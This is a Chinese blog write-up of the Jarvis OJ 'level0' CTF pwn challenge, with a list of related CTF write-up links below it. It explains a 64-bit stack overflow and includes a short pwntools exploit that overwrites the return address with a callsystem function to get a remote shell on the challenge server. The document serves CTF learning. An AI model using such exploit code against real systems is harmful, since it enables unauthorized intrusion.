Jarvis oj level0 wp

最新推荐文章于 2024-02-04 13:36:45 发布
最新推荐文章于 2024-02-04 13:36:45 发布
阅读量452 收藏
点赞数
分类专栏: pwn Jarvis OJ pwn题目 wp 文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43394612/article/details/85405441
版权

这题就是返回利用自身代码。

拿到题目首先检查有什么防护
在这里插入图片描述
开启了NX保护,没开canary和PIE,本身程序基址不会变。
放到 IDA里看一下:
main函数如下:在这里插入图片描述
调用了 vulner函数:
在这里插入图片描述
简单的栈溢出漏洞
在这里插入图片描述
这里看到有callsystem这个函数,那就很明显了,将返回地址覆盖为callsystem函数的地址即可。
计算下溢出点:
在这里插入图片描述
在这里插入图片描述
由于是64位的,不能访问超过0x00007fffffffffff的地址空间,所以会报错,不过可以通过查看RSP指向的值来确定:
在这里插入图片描述
确定溢出点:
在这里插入图片描述
exp如下:

from pwn import *

a=remote("pwn2.jarvisoj.com","9881")

payload='A'*136+p64(0x0000000000400596)

a.recvuntil("d")

a.send(payload)

a.interactive()

运行即可得到shell:
在这里插入图片描述

[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2687
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
jarvisoj pwn level5 wp
zszcr的博客
03-26 2017
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
jarvisoj_level0
shisuan1的博客
11-05 1932
jarvisoj_level0 通过命令检查文件类型file level0发现是64位的可执行文件 然后用64-ida打开 按F5显示伪代码,很简单这是一个hello world的程序 然后开始分析 可以看到main函数一共调用了三个函数 然后依次检查函数,检查 通过网上答案发现vunlnerable_function这个函数调用了200h的内存空间,其实作者也看不懂,建议进行这一步时先看...
Jarvis Oj Pwn 学习笔记-level0
baoan4763的博客
05-31 216
一道64位的pwn题 呈上地址: 原文件:https://files.cnblogs.com/files/Magpie/level0.rar nc pwn2.jarvisoj.com 9881 先查一下保护: 扔进ida: 典型的64位栈溢出,莫得啥子难度,注意一哈64位即可 控制流打到callsystem即可 地址是:0x400596 直接贴ex...
攻防世界 level0 wp
PushSafe
10-23 618
纯新手教程 如有错误的地方 请各位大佬指出. 利用的主要工具 ida / olldly / Peil / python pwntools level0 首先收集一下文件信息 64位程序 Arch: amd64-64-little 程序位数 RELRO:No Relro 开启无法修改got表 Stack: No canry found 开启则无法直接覆盖EIP让程序任意跳转,跳转后会进行cookie校验;但这项保护可以被绕过 NX开着(开启则shellcode无法被执行) Pie: No
Jarvis OJ Basic WP
qq_42192672的博客
09-20 1129
1. -.-字符串 摩斯密码 2. secret 打开题目地址是个网页跳转,据大佬说直接用burpsuite,我就试了一下 后来发现了个更方便的方法,直接F12,你懂的 3. A Piece Of Cake 在线工具:https://quipqiup.com/ 字母频率破解替换加密 分析上下文,发现缺少的字母是b,填充进去拿flag就好 4. 美丽的实验室logo 工具st...
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 433
Buu CTF PWN题jarvisoj_level0的WriteUp
jarvisoj pwn level4时LibcSearcher和DynELF搜到的libc版本不同
weixin_43350880的博客
08-07 858
jarvisoj pwn的level4乍一看是一道常规的ROP,可以ret2libc 但是遇到一个问题 自己写的脚本本地能跑通,远程跑不通 可以看到本地是能拿到shell的 在网上搜了其他人的wp,全都是用DynELF做的,对比发现是LibcSearcher和DynELF搜到的libc版本不同导致远程跑不通。 远程用DynELF找到的libc版本 远程LibcSearcher的结果 本地Dyn...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 472
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
Jarvis OJ pwn wp - level 0 ~ level 5
fa1c4的blog
07-03 383
level 0 溢出, ROP调用system("/bin/sh"), get shell from pwn import * from pwnlib.util.cyclic import cyclic sel = 1 filename = "./level0" URL, PORT = "pwn2.jarvisoj.com", 9881 io = process(filename) if sel == 0 else remote(URL, PORT) elf = ELF(filename) sy
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 1005
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
Jarvis oj level1 wp
ditto的博客
12-30 332
看下防护 啥也没开。 放IDA里看下: 很显然,利用泄露的数组的首地址来写通解,就不用管ASLR了。 exp如下: from pwn import* a=remote("pwn2.jarvisoj.com","9877") a.recvuntil("What's this:") addr=a.recvuntil(&
Jarvis OJ(PWN)level0
qq_43409582的博客
09-11 273
0x01 开始做Jarvisoj上的题了,先从最基本的开始吧。 首先看保护: 只开了NX,说明可能要利用栈溢出的知识。 打开IDA看main函数没什么东西,但return了一个函数打开一看发现了栈溢出漏洞: 然后找能利用的地方,发现了一个callsystem函数(太明显了)。。。 所以思路就是利用栈溢出漏洞直接覆盖到/bin/sh执行的地址上,就能getshell 了。 exp.py: f...
jarvisoj_level01解题
最新发布
2301_81504456的博客
02-04 684
jarvisoj_level01解题思路,破译,编写脚本。
笔记向——PWN jarvis oj level0
m0_52133692的博客
11-11 230
题目下载链接:https://dn.jarvisoj.com/challengefiles/level0.b9ded3801d6dd36a97468e128b81a65d 地址:nc pwn2.jarvisoj.com 9881 本人环境: ida反汇编工具(吾爱破解可下载到) 系统Ubuntu 18.04(linux的一个版本) pwntools(终端输入:sudo pip pwntools install 即可安装) pwndbg(终端输入:sudo clone https://github.com/p
CTF buuoj pwn-----第6题:jarvisoj_level0
bing_Max的博客
09-02 1150
CTF buuoj pwn-----第6题:ciscn_2019_n_1前言一、checksec 检测文件的保护机制二. 静态分析,IDA打开文件三. 编写EXP四. 运行EXP, 获取flag 前言 记录一下pwn的过程, 新手学习日记, 流水线记录. 打开题目, 连接靶机,下载文件level0 一、checksec 检测文件的保护机制 bing@bing-virtual-machine:~/pwn$ checksec ./level0 [*] '/home/bing/pwn/level0'
2021年线下“领航杯” MISC-《shizhenle》解题WP
Mark的博客
11-10 920
杂项一、前言二、解题步骤 一、前言 - 首先还得感谢套神的帮助,我太菜了,有想要复现这题的文章末尾有题目分析链接 二、解题步骤 1、打开压缩包发现里面只有一张图片,一张奇怪的png图片 2.一般情况下kali三部曲,没发现啥就放入010Editor看,这题也不例外先放kali里binwalk一下 发现有东西,foremost一波带走拿到有用的东西 打开这个zip文件夹发现存在加密文件,用360压缩打开,发现还是有密码直接排除伪加密 3.那接下来的思路只能换010Editor看细节了,这里考虑到图片是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值